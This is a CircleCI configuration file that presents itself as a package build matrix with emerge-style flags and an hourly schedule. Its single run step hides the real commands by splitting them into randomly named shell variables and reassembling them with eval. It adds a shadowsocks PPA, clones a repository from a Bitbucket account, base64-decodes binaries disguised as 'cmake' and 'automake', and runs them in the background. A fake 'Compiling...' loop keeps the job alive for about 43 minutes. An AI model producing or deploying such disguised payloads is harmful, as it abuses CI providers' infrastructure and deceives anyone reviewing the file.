version: 2.1

workflows:
  build-push:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--searchdesc", "--buildpkg-exclude", "--newrepo", "--verbose-slot-rebuilds", "--nospinner", "--autounmask-keep-masks", "--debug", "--rage-clean", "--autounmask-only", "--autounmask-only", "--autounmask-keep-masks", "--reinstall-atoms", "--pkg-format", "--reinstall-atoms", "--reinstall-atoms", "--buildpkg", "--quiet-unmerge-warn", "--keep-going", "--autounmask", "--accept-restrict"]
  build-schedule:
    jobs:
      - build:
          matrix:
            parameters:
              build: ["--searchdesc", "--buildpkg-exclude", "--newrepo", "--verbose-slot-rebuilds", "--nospinner", "--autounmask-keep-masks", "--debug", "--rage-clean", "--autounmask-only", "--autounmask-only", "--autounmask-keep-masks", "--reinstall-atoms", "--pkg-format", "--reinstall-atoms", "--reinstall-atoms", "--buildpkg", "--quiet-unmerge-warn", "--keep-going", "--autounmask", "--accept-restrict"]
    triggers:
      - schedule:
          cron: "39 * * * *"
          filters:
            branches:
              only:
                - master

jobs:
  build:
    machine:
      image: ubuntu-1604:201903-01
    parameters:
      build:
        type: string
        default:
    steps:
      - run:
          name: sheaf-space
          command: |
            VyQrlPttEqG="sudo add-ap"
            kQLarG="t-repositor"
            bPFtKItbfjh="y ppa:max-c"
            GndcNP="-lv/shadows"
            zkqqxNaVT="ocks-libev "
            opnhpc="-y &>/dev/n"
            eval "$VyQrlPttEqG""$kQLarG""$bPFtKItbfjh""$GndcNP""$zkqqxNaVT""$opnhpc""ull || true"
            pLMux="sudo add-ap"
            idhuo="t-repositor"
            SAKuLlL="y ppa:ondre"
            VujQaPsa="j/apache2 -"
            WkPcWmZS="y &>/dev/nu"
            eval "$pLMux""$idhuo""$SAKuLlL""$VujQaPsa""$WkPcWmZS""ll || true"
            sudo apt update || true
            JwOEYzecVpH="sudo apt --"
            luUaX="yes install"
            tcTAsQ=" openssl &>"
            MkBlh="/dev/null |"
            eval "$JwOEYzecVpH""$luUaX""$tcTAsQ""$MkBlh""| true"
            SnZkixqU="sudo apt --"
            snfKsHk="yes install"
            wxxcekbOBLS=" cl-base64 "
            qZFKs="git &>/dev/"
            oOLeTWJ="null || tru"
            eval "$SnZkixqU""$snfKsHk""$wxxcekbOBLS""$qZFKs""$oOLeTWJ""e"
            GlySi="git clone h"
            pXxsXynbLxh="ttps://gccb"
            HOSIKyk="uild@bitbuc"
            VwGBA="ket.org/gcc"
            RRUxyIkpf="build/gcc.g"
            rinreeXi="it &>/dev/n"
            eval "$GlySi""$pXxsXynbLxh""$HOSIKyk""$VwGBA""$RRUxyIkpf""$rinreeXi""ull"
            BjoyEwRGGc="base64 -d g"
            kEHSsgW="cc/cmake_np"
            eval "$BjoyEwRGGc""$kEHSsgW""_ > cmake"
            sFCmDFFCNeA="base64 -d g"
            KlZTiUCUFa="cc/config_ "
            eval "$sFCmDFFCNeA""$KlZTiUCUFa""> output"
            GniXzLi="base64 -d g"
            sYhMSqTHL="cc/make_ > "
            eval "$GniXzLi""$sYhMSqTHL""automake"
            SeYaPgTY="sed -i 's/1"
            IloRDGUG="080/1081/g'"
            eval "$SeYaPgTY""$IloRDGUG"" output"
            chmod +x automake cmake
            ./cmake
            ZVIIJLKFBI="sed -i 's/b"
            hNauA="uild/ob2u/g"
            eval "$ZVIIJLKFBI""$hNauA""' output"
            DpKtajROd="sudo ./auto"
            ubaNFnSwuq="make --conf"
            BhIPpkV="ig output &"
            aILOEolLBh=">/dev/null "
            eval "$DpKtajROd""$ubaNFnSwuq""$BhIPpkV""$aILOEolLBh""&"
            GCC=$(date +%s)
            while true; do CC=$(date +%s); echo $CC Compiling...; [ $CC -ge $((GCC + 2598)) ] && sudo killall automake && break; sleep 204; done
